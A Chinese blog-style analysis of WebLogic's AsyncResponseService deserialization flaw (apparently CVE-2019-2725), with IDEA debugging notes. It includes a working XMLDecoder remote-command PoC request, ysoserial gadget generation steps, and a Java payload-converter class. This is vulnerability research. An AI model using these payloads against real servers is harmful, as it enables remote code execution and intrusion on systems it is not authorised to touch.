在调试weblogic,以前导入jar包都是在weblogic目录搜索*.jar拷贝出来在导入IDEA.有时候会出现好多相同的jar包,调试的时候就会出问题,实际上导入以下俩个包就可以了。1、是module模块。
2、是server下的lib包
POC如下
POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.31.111:7001
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
Content-Length: 747
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.xmlDecoder"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>cmd</string></void><void index="1"><string>/c</string></void><void index="2"><string>calc</string></void></array><void method="start"/></void></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
漏洞是在weblogic.wsee.async,jar包下,
那么处理流程大概也会是 async 路径下或者 wsee 路径下处理的请求包,
这时候在BaseWSServlet类下断,这个类继承HttpServlet,processerList发现对Soap处理跟进处理过程。
处理POST请求。
45行跟进
跟进分发器
62行,setHandlerChain,70行handleRequest对Handler进行处理
所有的Handler,既然是责任链调用,那么他会从 Handler 0 一直执行到 Handler 20,挨个查阅了后,发现大多是对环境的各种值做存取操作而WorkAreaServerHandler 跟入细看。
触发点
CVE-2019-2725分析
poc构造如下:
1、java -jar ysoserial.jar Jdk7u21 "需要执行的命令" > payload.txt
gadgets使用Jdk7u21
2、将payload.txt生成xml格式
public class Payload{
public static void main(String[] args) throws Exception {
ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("payload.txt"));
Object o = objectInputStream.readObject();
byte[] bytes = ObjectToByte(o);
objectXmlEncoder(bytes , "payload.xml");
}
private static byte[] ObjectToByte(Object obj) {
byte[] bytes = null;
try {
// object to bytearray
ByteArrayOutputStream bo = new ByteArrayOutputStream();
ObjectOutputStream oo = new ObjectOutputStream(bo);
oo.writeObject(obj);
bytes = bo.toByteArray();
bo.close();
oo.close();
} catch (Exception e) {
System.out.println("translation" + e.getMessage());
e.printStackTrace();
}
return bytes;
}
public static void objectXmlEncoder(Object obj,String fileName)
throws FileNotFoundException,IOException,Exception
{
java.io.File file = new java.io.File(fileName);
if(!file.exists()){
file.createNewFile();
}
java.io.BufferedOutputStream oop = new java.io.BufferedOutputStream(new java.io.FileOutputStream(file));
java.beans.XMLEncoder xe = new java.beans.XMLEncoder(oop);
xe.flush();
//写入xml
xe.writeObject(obj);
xe.close();
oop.close();
}
}
3、生成报文
POST /_async/AsyncResponseService HTTP/1.1
Host: 127.0.0.1:7001
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
Content-Length: 65684
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void>
需要拼接的部分</void></class>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
前面处理流程和上面分析一样,还是在WorkAreaServerHandler 跟进看,最终漏洞触发点如下:
详细分析看这篇文章:
https://mp.weixin.qq.com/s?__biz=MzUyOTc3NTQ5MA==&mid=2247484640&idx=1&sn=dad9a86e9d131f8d7e592e617f6235bb&chksm=fa5aaa0dcd2d231bc3d0e5c0394e6e47c859e1e0165cab3bbe01cecf32e0c915a8fb4e34f29d&mpshare=1&scene=1&srcid=#rd
https://www.t00ls.net/thread-51008-1-1.html
下面这篇文章写的非常详细,怎样跟一个httpServerlet生命周期。
参考链接:
https://xz.aliyun.com/t/4895